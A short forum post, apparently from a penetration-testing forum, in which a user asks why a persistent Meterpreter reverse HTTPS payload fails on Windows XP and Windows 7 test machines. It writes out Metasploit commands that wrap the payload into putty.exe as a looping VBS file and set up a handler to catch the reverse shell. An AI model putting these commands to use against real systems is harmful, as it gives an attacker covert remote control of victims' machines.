Results 1 to 1 of 1

Thread: reverse_https problem

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default reverse_https problem

    Hello community!

    I've got a problem with the new Persistent Meterpreter over Reverse HTTPS HD Moore posted some time ago.

    I'm running BT4 using Metasploit 3.3 (already tried a new manaual svn installation) and I just can't get things to work. Everytime I follow the instructions, create the vbs-file, start the handler and all I get is a 100% cpu process wscript.exe on the test victim. As mentioned in the blog post, I tested the handler with WAVE successfully. Does anyone know how to solve this issue? Here are the commands I use:

    Code:
    ./msfpayload windows/meterpreter/reverse_https LHOST=xxx.xxx.xxx.xxx LPORT=xxxx R | ./msfencode -x /r
    oot/payloads/putty.exe -t loop-vbs -o /root/test/final.vbs
    Code:
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    msf exploit(handler) > set LPORT xxxx
    LPORT => xxxx
    msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
    LHOST => xxx.xxx.xxx.xxx
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j[*] Exploit running as background job.
    msf exploit(handler) >[*] HTTPS listener started on https://xxx.xxx.xxx.xxx:xxxx/[*] Starting the payload handler...
    Tested victims are Win XP SP2 and Win 7. Same behaviour on both of'em.

    Help would be highly appreciated. Please let me know if you need some more information! Thanks in advance!

    If my problem's too special for the beginner's forum, could a mod please move the thread to the expert's area?
    Last edited by Archangel-Amael; 04-20-2010 at 09:02 PM.

Similar Threads

  1. Replies: 3
    Last Post: 06-17-2008, 08:08 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •